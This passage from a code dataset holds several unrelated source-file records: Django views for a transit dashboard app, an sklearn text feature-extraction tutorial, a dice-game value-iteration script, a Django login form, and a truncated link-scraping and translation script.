(ie. they didn't type it)\n referer = request.META.get('HTTP_REFERER')\n # if we've never seen a referer from this user, then don't do a\n # redirect\n if (not referer) and request.session.get('seen_http_referer', False):\n dash_pk = request.session.get('td_last_dashboard')\n # fallback: dashboard list\n redirect = reverse('traveldash.mine.views.dashboard_list')\n if dash_pk:\n try:\n dashboard = Dashboard.objects.filter(user=request.user).get(pk=dash_pk)\n redirect = dashboard.get_absolute_url()\n except Dashboard.DoesNotExist:\n pass\n return HttpResponseRedirect(redirect)\n\n example_dashboard = Dashboard.objects.exclude(routes__isnull=True).order_by('?')[0]\n return TemplateResponse(request, \"mine/home.html\", {'example_dashboard': example_dashboard})\n\n\n@vary_on_cookie\ndef dashboard(request, pk):\n try:\n dashboard = Dashboard.objects.get(pk=pk)\n except Dashboard.DoesNotExist:\n raise Http404\n\n dashboard.touch()\n\n context = {\n 'dashboard': dashboard,\n 'is_owner': (dashboard.user == request.user),\n }\n if request.user == dashboard.user:\n request.session['td_last_dashboard'] = dashboard.pk\n return TemplateResponse(request, \"mine/dashboard.html\", context)\n\n\n@vary_on_cookie\n@cache_control(must_revalidate=True)\ndef dashboard_update(request, pk):\n try:\n dashboard = Dashboard.objects.get(pk=pk)\n except Dashboard.DoesNotExist:\n return HttpResponse(json.dumps({\"error\": \"dashboard-not-found\"}), status=404, content_type=\"application/json\")\n\n content = dashboard.as_json()\n return HttpResponse(json.dumps(content), content_type=\"application/json\")\n\n\n@login_required\ndef dashboard_list(request):\n c = {\n 'dashboard_list': Dashboard.objects.filter(user=request.user),\n 'base_url': request.build_absolute_uri('/')[:-1],\n }\n return TemplateResponse(request, \"mine/dashboard_list.html\", c)\n\n\nclass RouteForm(BootstrapModelForm):\n class Meta:\n model = DashboardRoute\n fields = ('id', 'from_stop', 'walk_time_start', 'to_stop', 'walk_time_end',)\n widgets = {\n 'from_stop': forms.TextInput(attrs={'class': 'gtfsStop'}),\n 'to_stop': forms.TextInput(attrs={'class': 'gtfsStop'}),\n }\n\n def clean(self):\n cd = self.cleaned_data\n if ('from_stop' in cd) and ('to_stop' in cd):\n if not Route.objects.between_stops(cd['from_stop'], cd['to_stop']).exists():\n raise forms.ValidationError(\"No Transport routes between the stops you've selected\")\n return cd\n\n def stop_json(self):\n return json.dumps({\n 'from_stop': self._stop_info(self['from_stop'].value()),\n 'to_stop': self._stop_info(self['to_stop'].value()),\n })\n\n def _stop_info(self, stop_id):\n if not stop_id:\n return None\n try:\n stop = Stop.objects.get(pk=stop_id)\n return {'id': stop.pk, 'name': stop.name, 'location': stop.location.tuple}\n except Stop.DoesNotExist:\n return None\n\nRouteFormSet = inlineformset_factory(Dashboard, DashboardRoute, form=RouteForm, extra=1)\n\n\nclass DashboardForm(BootstrapModelForm):\n class Meta:\n model = Dashboard\n exclude = ('user', 'last_viewed',)\n\n\n@login_required\ndef dashboard_create(request):\n if request.method == \"POST\":\n form = DashboardForm(request.POST)\n if form.is_valid():\n dashboard = form.save(commit=False)\n dashboard.user = request.user\n route_formset = RouteFormSet(request.POST, instance=dashboard)\n if route_formset.is_valid():\n dashboard.save()\n route_formset.save()\n messages.success(request, \"Created!\")\n return HttpResponseRedirect(dashboard.get_absolute_url())\n else:\n route_formset = RouteFormSet(instance=Dashboard())\n else:\n # try to find the best city match\n initial = {}\n if request.user.dashboards.exists():\n # Use existing city to start with\n initial['city'] = request.user.dashboards.all()[0].city\n else:\n # try a GeoIP lookup\n geoip = GeoIP().geos(request.META['REMOTE_ADDR'])\n if geoip:\n initial['city'] = City.objects.distance(geoip).order_by('-distance')[0]\n\n form = DashboardForm(initial=initial)\n route_formset = RouteFormSet(instance=Dashboard())\n\n context = {\n 'form': form,\n 'route_formset': route_formset,\n 'title': 'New Dashboard',\n 'stopFusionTableId': settings.GTFS_STOP_FUSION_TABLE_ID,\n 'city_data': json.dumps(City.objects.get_map_info()),\n }\n return TemplateResponse(request, \"mine/dashboard_form.html\", context)\n\n\n@login_required\ndef dashboard_edit(request, pk):\n try:\n dashboard = Dashboard.objects.filter(user=request.user).get(pk=pk)\n except Dashboard.DoesNotExist:\n raise Http404\n\n if request.method == \"POST\":\n form = DashboardForm(request.POST, instance=dashboard)\n if form.is_valid():\n form.save(commit=False)\n route_formset = RouteFormSet(request.POST, instance=dashboard)\n if route_formset.is_valid():\n dashboard.save()\n route_formset.save()\n\n if dashboard.routes.count() == 0:\n dashboard.delete()\n messages.success(request, \"Deleted empty dashboard\")\n return HttpResponseRedirect(reverse('traveldash.mine.views.dashboard_list'))\n else:\n messages.success(request, \"Saved\")\n return HttpResponseRedirect(dashboard.get_absolute_url())\n else:\n form = DashboardForm(instance=dashboard)\n route_formset = RouteFormSet(instance=dashboard)\n\n context = {\n 'form': form,\n 'route_formset': route_formset,\n 'title': 'Edit Dashboard',\n 'dashboard': dashboard,\n 'stopFusionTableId': settings.GTFS_STOP_FUSION_TABLE_ID,\n 'city_data': json.dumps(City.objects.get_map_info()),\n }\n return TemplateResponse(request, \"mine/dashboard_form.html\", context)\n\n\nclass DashboardDelete(DeleteView):\n context_object_name = \"dashboard\"\n\n @method_decorator(login_required)\n def dispatch(self, *args, **kwargs):\n return super(DashboardDelete, self).dispatch(*args, **kwargs)\n\n def get_queryset(self):\n return Dashboard.objects.filter(user=self.request.user)\n\n def get_success_url(self):\n return reverse('traveldash.mine.views.dashboard_list')\n", "repo_name": "rcoup/traveldash", "sub_path": "traveldash/mine/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7758, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.core.urlresolvers.reverse", "line_number": 34, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard.objects.filter", "line_number": 37, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 37, "usage_type": "name"}, {"api_name": "traveldash.mine.models.Dashboard.DoesNotExist", "line_number": 39, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 39, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 41, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard.objects.exclude", "line_number": 43, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard.objects", "line_number": 43, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 43, "usage_type": "name"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 44, "usage_type": "call"}, {"api_name": "django.views.decorators.vary.vary_on_cookie", "line_number": 23, "usage_type": "name"}, {"api_name": "traveldash.mine.models.Dashboard.objects.get", "line_number": 50, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard.objects", "line_number": 50, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 50, "usage_type": "name"}, {"api_name": "traveldash.mine.models.Dashboard.DoesNotExist", "line_number": 51, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 51, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 52, "usage_type": "name"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 62, "usage_type": "call"}, {"api_name": "django.views.decorators.vary.vary_on_cookie", "line_number": 47, "usage_type": "name"}, {"api_name": "traveldash.mine.models.Dashboard.objects.get", "line_number": 69, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard.objects", "line_number": 69, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 69, "usage_type": "name"}, {"api_name": "traveldash.mine.models.Dashboard.DoesNotExist", "line_number": 70, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 70, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 71, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 71, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 74, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 74, "usage_type": "call"}, {"api_name": "django.views.decorators.vary.vary_on_cookie", "line_number": 65, "usage_type": "name"}, {"api_name": "django.views.decorators.cache.cache_control", "line_number": 66, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard.objects.filter", "line_number": 80, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard.objects", "line_number": 80, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 80, "usage_type": "name"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 83, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 77, "usage_type": "name"}, {"api_name": "bootstrap.forms.BootstrapModelForm", "line_number": 86, "usage_type": "name"}, {"api_name": "traveldash.mine.models.DashboardRoute", "line_number": 88, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 91, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 91, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 92, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 92, "usage_type": "name"}, {"api_name": "traveldash.gtfs.models.Route.objects.between_stops", "line_number": 98, "usage_type": "call"}, {"api_name": "traveldash.gtfs.models.Route.objects", "line_number": 98, "usage_type": "attribute"}, {"api_name": "traveldash.gtfs.models.Route", "line_number": 98, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 99, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 99, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 103, "usage_type": "call"}, {"api_name": "traveldash.gtfs.models.Stop.objects.get", "line_number": 112, "usage_type": "call"}, {"api_name": "traveldash.gtfs.models.Stop.objects", "line_number": 112, "usage_type": "attribute"}, {"api_name": "traveldash.gtfs.models.Stop", "line_number": 112, "usage_type": "name"}, {"api_name": "traveldash.gtfs.models.Stop.DoesNotExist", "line_number": 114, "usage_type": "attribute"}, {"api_name": "traveldash.gtfs.models.Stop", "line_number": 114, "usage_type": "name"}, {"api_name": "django.forms.models.inlineformset_factory", "line_number": 117, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 117, "usage_type": "argument"}, {"api_name": "traveldash.mine.models.DashboardRoute", "line_number": 117, "usage_type": "argument"}, {"api_name": "bootstrap.forms.BootstrapModelForm", "line_number": 120, "usage_type": "name"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 122, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 137, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 137, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 138, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 140, "usage_type": "call"}, {"api_name": "django.contrib.gis.utils.GeoIP", "line_number": 149, "usage_type": "call"}, {"api_name": "traveldash.mine.models.City.objects.distance", "line_number": 151, "usage_type": "call"}, {"api_name": "traveldash.mine.models.City.objects", "line_number": 151, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.City", "line_number": 151, "usage_type": "name"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 154, "usage_type": "call"}, {"api_name": "django.conf.settings.GTFS_STOP_FUSION_TABLE_ID", "line_number": 160, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 160, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 161, "usage_type": "call"}, {"api_name": "traveldash.mine.models.City.objects.get_map_info", "line_number": 161, "usage_type": "call"}, {"api_name": "traveldash.mine.models.City.objects", "line_number": 161, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.City", "line_number": 161, "usage_type": "name"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 163, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 126, "usage_type": "name"}, {"api_name": "traveldash.mine.models.Dashboard.objects.filter", "line_number": 169, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard.objects", "line_number": 169, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 169, "usage_type": "name"}, {"api_name": "traveldash.mine.models.Dashboard.DoesNotExist", "line_number": 170, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 170, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 171, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 184, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 184, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 185, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 185, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 187, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 187, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 188, "usage_type": "call"}, {"api_name": "django.conf.settings.GTFS_STOP_FUSION_TABLE_ID", "line_number": 198, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 198, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 199, "usage_type": "call"}, {"api_name": "traveldash.mine.models.City.objects.get_map_info", "line_number": 199, "usage_type": "call"}, {"api_name": "traveldash.mine.models.City.objects", "line_number": 199, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.City", "line_number": 199, "usage_type": "name"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 201, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 166, "usage_type": "name"}, {"api_name": "django.views.generic.DeleteView", "line_number": 204, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 207, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 207, "usage_type": "argument"}, {"api_name": "traveldash.mine.models.Dashboard.objects.filter", "line_number": 212, "usage_type": "call"}, {"api_name": "traveldash.mine.models.Dashboard.objects", "line_number": 212, "usage_type": "attribute"}, {"api_name": "traveldash.mine.models.Dashboard", "line_number": 212, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 215, "usage_type": "call"}]}
+{"seq_id": "13195459421", "text": "# -*- coding: utf-8 -*-\r\n# @Time : 2021/7/28 11:15\r\n# @Author : ZiruZha\r\n# @File : FeatureExtraction.py\r\n# @Software: PyCharm\r\n\r\n\r\n\"\"\"\r\n特征提取\r\nFeature extraction\r\nThe sklearn.feature_extraction module can be used to extract features in a format supported by machine learning algorithms from datasets consisting of formats such as text and image.\r\n\r\nNote Feature extraction is very different from Feature selection: the former consists in transforming arbitrary data, such as text or images, into numerical features usable for machine learning. The latter is a machine learning technique applied on these features.\r\n\"\"\"\r\n\"\"\"\r\n@article{scikit-learn,\r\n title={Scikit-learn: Machine Learning in {P}ython},\r\n author={Pedregosa, F. and Varoquaux, G. and Gramfort, A. and Michel, V.\r\n and Thirion, B. and Grisel, O. and Blondel, M. and Prettenhofer, P.\r\n and Weiss, R. and Dubourg, V. and Vanderplas, J. and Passos, A. and\r\n Cournapeau, D. and Brucher, M. and Perrot, M. and Duchesnay, E.},\r\n journal={Journal of Machine Learning Research},\r\n volume={12},\r\n pages={2825--2830},\r\n year={2011}\r\n}\r\n\"\"\"\r\n\r\n# 导入数据库\r\nfrom sklearn.datasets import load_iris\r\n# 导入数据库分类函数\r\nfrom sklearn.model_selection import train_test_split\r\n# 导入字典特征提取函数\r\nfrom sklearn.feature_extraction import DictVectorizer\r\n# 导入文本特征提取函数\r\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\r\n# 分词处理\r\nimport jieba\r\n\r\n\r\ndef datasets_demo():\r\n # sklearn数据集使用\r\n # 获取数据集\r\n # 小规模数据用load��大规模数据用fetch\r\n iris = load_iris()\r\n \"\"\"\r\n print(\"鸢尾花数据集:\\n\", iris)\r\n print(\"查看数据集描述:\\n\", iris[\"DESCR\"])\r\n print(\"查看特征值名字:\\n\", iris.feature_names)\r\n print(\"查看特征值:\\n\", iris.data, iris.data.shape)\r\n \"\"\"\r\n\r\n # 数据集划分\r\n x_train, x_test, y_train, y_test = train_test_split(iris.data, iris.target, test_size=0.2, random_state=22)\r\n\r\n return None\r\n\r\n\r\ndef dict_demo():\r\n \"\"\"\r\n 字典特征抽取\r\n :return:\r\n \"\"\"\r\n data = [{'name': 'a', 'age': 1}, {'name': 'b', 'age': 2}, {'name': 'c', 'age': 3}]\r\n # 1. 实例化一个转换器\r\n # DictVectorizer()函数默认返回sparse矩阵(稀疏矩阵)——给出矩阵中非零值的位置与值\r\n # 当类别较多时,sparse矩阵可以节省内存\r\n # 用one-hot编码表示类别\r\n # One-Hot编码,又称一位有效编码。其方法是使用N位状态寄存器来对N个状态进行编码,每个状态都有它独立的寄存器位,并且在任意时候,其中只有一位有效。\r\n transform = DictVectorizer(sparse=False)\r\n # 2. 调用fit_transform()方法,传入字典参数\r\n data_new = transform.fit_transform(data)\r\n print(\"data_new:\\n\", data_new)\r\n print(\"特征名字\\n\", transform.get_feature_names())\r\n return None\r\n\r\n\r\ndef count_demo():\r\n \"\"\"\r\n 英文文本特征抽取:CountVectorizer()\r\n 统计每个单词特征值出现的次数\r\n :return:\r\n \"\"\"\r\n data = [\"To be or not to be\", \"I have a pen\"]\r\n # 1. 实例化一个转换器类\r\n # CountVectorizer()不统计单个字母单词,如I a\r\n # CountVectorizer()只能返回sparse矩阵\r\n # CountVectorizer()无sparse参数,\r\n # 停用词stop_words参数,列表,不统计列表包含的单词\r\n transform = CountVectorizer(stop_words=[\"be\", \"to\"])\r\n # 2. 调用fit_transform()方法\r\n data_new = transform.fit_transform(data)\r\n print(\"data_new:\\n\", data_new.toarray())\r\n print(\"特征名字\\n\", transform.get_feature_names())\r\n return None\r\n\r\n\r\ndef count_chinese_demo():\r\n \"\"\"\r\n 中文文本特征抽取:CountVectorizer()\r\n 统计每个短语特征值出现的次数\r\n 需要进行分字处理\r\n :return:\r\n \"\"\"\r\n data = [\"一二三四五\", \"上山打老虎\"]\r\n # 1. 实例化一个转换器类\r\n # CountVectorizer()只能返回sparse矩阵\r\n # CountVectorizer()无sparse参数,\r\n transform = CountVectorizer()\r\n # 2. 调用fit_transform()方法\r\n data_new = transform.fit_transform(data)\r\n print(\"data_new:\\n\", data_new.toarray())\r\n print(\"特征名字\\n\", transform.get_feature_names())\r\n return None\r\n\r\n\r\ndef cut_word(text):\r\n \"\"\"\r\n 进行中文分词:”我爱北京天安门“-->”我 爱 北京 天安门“\r\n :param text:\r\n :return:\r\n \"\"\"\r\n return \" \".join(list(jieba.cut(text)))\r\n\r\n\r\ndef count_chinese_demo2():\r\n \"\"\"\r\n 中文文本特征提取,自动分词\r\n :return:\r\n \"\"\"\r\n data = [\r\n \"鲁镇的酒店的格局,是和别处不同的:都是当街一个曲尺形的大柜台,柜里面预备着热水,可以随时温酒。做工的人,傍午傍晚散了工,每每花四文铜钱,买一碗酒,——这是二十多年前的事,现在每碗要涨到十文,——靠柜外站着,热热的喝了休息;倘肯多花一文,便可以买一碟盐煮笋,或者茴香豆,做下酒物了,如果出到十几文,那就能买一样荤菜,但这些顾客,多是短衣帮,大抵没有这样阔绰。只有穿长衫的,才踱进店面隔壁的房子里,要酒要菜,慢慢地坐喝。\",\r\n \"我从十二岁起,便在镇口的咸亨酒店里当伙计,掌柜说,我样子太傻,怕侍候不了长衫主顾,就在外面做点事罢。外面的短衣主顾,虽然容易说话,但唠唠叨叨缠夹不清的也很不少。他们往往要亲眼看着黄酒从坛子里舀出,看过壶子底里有水没有,又亲看将壶子放在热水里,然后放心:在这严重监督下,羼水也很为难。所以过了几天,掌柜又说我干不了这事。幸亏荐头的情面大,辞退不得,便改为专管温酒的一种无聊职务了。\",\r\n \"我从此便整天的站在柜台里,专管我的职务。虽然没有什么失职,但总觉得有些单调,有些无聊。掌柜是一副凶脸孔,主顾也没有好声气,教人活泼不得;只有孔乙己到店,才可以笑几声,所以至今还记得。\"]\r\n # 0. 将中文文本进行分词\r\n data_new = []\r\n for sent in data:\r\n data_new.append(cut_word(sent))\r\n # print(data_new)\r\n # 1. 实例化一个转换器类\r\n # CountVectorizer()只能返回sparse矩阵\r\n # CountVectorizer()无sparse参数,\r\n transform = CountVectorizer()\r\n # 2. 调用fit_transform()方法\r\n data_final = transform.fit_transform(data_new)\r\n print(\"data_new:\\n\", data_final.toarray())\r\n print(\"特征名字\\n\", transform.get_feature_names())\r\n return None\r\n\r\n\r\ndef tfidf_demo():\r\n \"\"\"\r\n 用tfidf函数进行文本特征提取\r\n tfidf: TF-IDF is a statistical measure that evaluates how relevant a word is to a document in a collection of documents.This is done by multiplying two metrics: how many times a word appears in a document, and the inverse document frequency of the word across a set of documents.\r\n :return:\r\n \"\"\"\r\n data = [\r\n \"鲁镇的酒店的格局,是和别处不同的:都是当街一个曲尺形的大柜台,柜里面预备着热水,可以随时温酒。做工的人,傍午傍晚散了工,每每花四文铜钱,买一碗酒,——这是二十多年前的事,现在每碗要涨到十文,——靠柜外站着,热热的喝了休息;倘肯多花一文,便可以买一碟盐煮笋,或者茴香豆,做下酒物了,如果出到十几文,那就能买一样荤菜,但这些顾客,多是短衣帮,大抵没有这样阔绰。只有穿长衫的,才踱进店面隔壁的房子里,要酒要菜,慢慢地坐喝。\",\r\n \"我从十二岁起,便在镇口的咸亨酒店里当伙计,掌柜说,我样子太傻,怕侍候不了长衫主顾,就在外面做点事罢。外面的短衣主顾,虽然容易说话,但唠唠叨叨缠夹不清的也很不少。他们往往要亲眼看着黄酒从坛子里舀出,看过壶子底里有水没有,又亲看将壶子放在热水里,然后放心:在这严重监督下,羼水也很为难。所以过了几天,掌柜又说我干不了这事。幸亏荐头的情面大,辞退不得,便改为专管温酒的一种无聊职务了。\",\r\n \"我从此便整天的站在柜台里,专管我的职务。虽然没有什么失职,但总觉得有些单调,有些无聊。掌柜是一副凶脸孔,主顾也没有好声气,教人活泼不得;只有孔乙己到店,才可以笑几声,所以至今还记得。\"]\r\n # 0. 将中文文本进行分词\r\n data_new = []\r\n for sent in data:\r\n data_new.append(cut_word(sent))\r\n # print(data_new)\r\n # 1. 实例化一个转换器类\r\n transform = TfidfVectorizer()\r\n # 2. 调用fit_transform()方法\r\n data_final = transform.fit_transform(data_new)\r\n print(\"data_new:\\n\", data_final.toarray())\r\n print(\"特征名字\\n\", transform.get_feature_names())\r\n return None\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # sklearn数据集使用\r\n # datasets_demo()\r\n # 字典特征抽取\r\n # dict_demo()\r\n # 英文本特征抽取:CountVectorizer()\r\n # count_demo()\r\n # 中文本特征抽取:CountVectorizer()\r\n # count_chinese_demo()\r\n # count_chinese_demo2()\r\n # 中文分词\r\n # print(cut_word(\"我爱北京天安门\"))\r\n # tfidf 文本特征提取\r\n tfidf_demo()\r\n", "repo_name": "ZiruZha/Machine-Learning", "sub_path": "Day1/FeatureExtraction.py", "file_name": "FeatureExtraction.py", "file_ext": "py", "file_size_in_byte": 9413, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sklearn.datasets.load_iris", "line_number": 45, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 54, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.DictVectorizer", "line_number": 70, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 90, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 109, "usage_type": "call"}, {"api_name": "jieba.cut", "line_number": 123, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 143, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 167, "usage_type": "call"}]}
+{"seq_id": "35937744335", "text": "from enum import Enum\nimport sys\n\nfrom game import Game\n\n\nclass Modes(Enum):\n play = 0\n solve = 1\n check = 2\n\n\nEPSILON = 1e-4\nDEFAULT_PARAMS = (6, 3, 30, 200, 30, 50)\n# The default parameters are arbitrary values\n\n\ndef optimal_gain_gld(N, K, W, L, CR, CT):\n \"\"\"Launch the solve version of the game computing the optimal policy \"\"\"\n env = Game(N, K, W, L, CR, CT)\n\n g_star, _ = env.value_iteration(EPSILON)\n\n return g_star\n\n\ndef play_gld(N, K, W, L, CR, CT):\n \"\"\"Launch the interactive version of the game\"\"\"\n env = Game(N, K, W, L, CR, CT)\n\n env.play_interactive()\n\n\ndef main(argv):\n \"\"\"The default parameters are used if no parameter is specified when calling the main function\"\"\"\n print(\n \"This script can be run using \"\n \"'$ python3 ./main.py [play, solve, check] [N K W L CR CT] [epsilon]'.\\n\"\n )\n\n if len(argv) < 2:\n mode = Modes.solve\n else:\n if argv[1] == \"solve\":\n mode = Modes.solve\n elif argv[1] == \"play\":\n mode = Modes.play\n elif argv[1] == \"check\":\n mode = Modes.check\n else:\n raise ValueError(\n \"First optional command-line argument should be 'solve', 'play' or 'check.\"\n )\n\n if len(argv) >= 8:\n params = tuple(int(arg) for arg in argv[2:8])\n else:\n params = DEFAULT_PARAMS\n\n if len(argv) == 9:\n epsilon = float(argv[8])\n else:\n epsilon = EPSILON\n\n print(\n f\"Running in {mode.name} mode with parameters {params} \"\n + (f\"and epsilon = {epsilon}\"\n if mode in (Modes.solve, Modes.check)\n else \"\")\n )\n\n env = Game(*params)\n\n if mode == Modes.solve:\n g_star, opt_policy = env.value_iteration(epsilon)\n print(f\"Found optimal average gain g* = {g_star}.\")\n\n elif mode == Modes.check:\n g_star, opt_policy = env.value_iteration(epsilon)\n print(f\"Found optimal average gain g* = {g_star}.\")\n env.plot_average_gain(2_000, opt_policy, g_star)\n\n else:\n env.play_interactive()\n\n\nmain(sys.argv)\n", "repo_name": "StrappazzonHugo/GodsLoveDinosaurs", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2086, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "enum.Enum", "line_number": 7, "usage_type": "name"}, {"api_name": "game.Game", "line_number": 20, "usage_type": "call"}, {"api_name": "game.Game", "line_number": 29, "usage_type": "call"}, {"api_name": "game.Game", "line_number": 72, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 87, "usage_type": "attribute"}]}
+{"seq_id": "38876187336", "text": "from django import forms\n\n\nclass EmailLoginForm(forms.Form):\n email = forms.EmailField()\n\n def __init__(self, *args, **kwargs):\n super(forms.Form, self).__init__(*args, **kwargs)\n self.fields['email'].widget.attrs.update({\n 'class': 'input__wide',\n 'autofocus': 'autofocus',\n })\n", "repo_name": "pythonkr/seminar", "sub_path": "sentinel/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 328, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.forms.Form", "line_number": 4, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 4, "usage_type": "name"}, {"api_name": "django.forms.EmailField", "line_number": 5, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 5, "usage_type": "name"}, {"api_name": "django.forms.Form", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 8, "usage_type": "name"}]}
+{"seq_id": "40686823726", "text": "from textextract.linkextract import Try\nimport os\nimport re\nfrom googletrans import Translator\nimport time\n\n\nobj = Try()\nobj.html_collect()\nf = open(\"htmls.txt\", \"w+\")\nfor element in obj.reformat():\n f.write(element+'\\n')\nf.close()\n\nobj = Try()\nobj.linkextract()\n\nwith open(\"../textextract/unreformat.txt\", \"r+\", encoding='utf-8') as data:\n contents = data.readlines()\n new_code = '[' + ',\\n'.join(contents) + ']'\n f = open(\"../textextract/Output.txt\", \"w\", encoding='utf-8')\n f.write(new_code)\nf.close()\n\nwith open(\"../textextract/Output.txt\", \"r+\", encoding='utf-8') as line:\n collect = line.readlines()\n\n\n\n\n\n\n count = 0\n for line in collect:\n if line[0] == ',' or line[0] == '[' or line[0] == '\\n' or line[0] == ']':\n print(\"\")\n else:\n\n\n with open(\"../textextract/copy.txt\", \"a\", encoding='utf-8') as f:\n f.write(line)\n f.close\n\nif os.path.exists(\"halfcompleted.txt\"):\n open('halfcompleted.txt', 'w').close()\n\nwith open(\"../textextract/copy.txt\", \"r+\", encoding='utf-8') as data:\n contents = data.readlines()\n n = len(contents)\n text = []\n print(n)\n count = 0\n for line in contents:\n if count < n - 1:\n myString = contents[count].replace(\"\\u00A0\", \" \")\n f = open(\"halfcompleted.txt\", \"a\", encoding='utf-8')\n print(re.sub(r\"^\\s+\", \"\", contents[count + 1]), sep='', file=f)\n\n f.close()\n count += 1\n\n\n\n else:\n continue\nprint(text)\n\ndata.close()\n\nif os.path.exists(\"../textextract/ok.txt\"):\n open('../textextract/ok.txt', 'w').close()\nwith open(\"halfcompleted.txt\", \"r+\", encoding='utf-8') as data:\n contents = data.readlines()\n for line in contents:\n f = open(\"../textextract/ok.txt\", \"a\", encoding='utf-8')\n if line == '\\n':\n continue\n print(line.rstrip(\"\\n\"), file=f)\ndata.close\n\nif os.path.exists('../textextract/english.txt'):\n open('../textextract/english.txt', 'w').close()\n\ntranslator = Translator()\nf = open(\"../textextract/ok.txt\", \"r\", encoding='utf-8')\nsample = f.readlines()\ncount = 0\ni = 100\ntranslated = []\n\nfor line in sample:\n with open(\"../textextract/english.txt\", \"a\", encoding='utf-8') as english:\n try:\n if count == i:\n time.sleep(1.1)\n translated = translator.translate(sample[count], dest=\"en\")\n print(translated)\n english.write(translated.text + '\\n')\n english.close()\n i += i\n count += 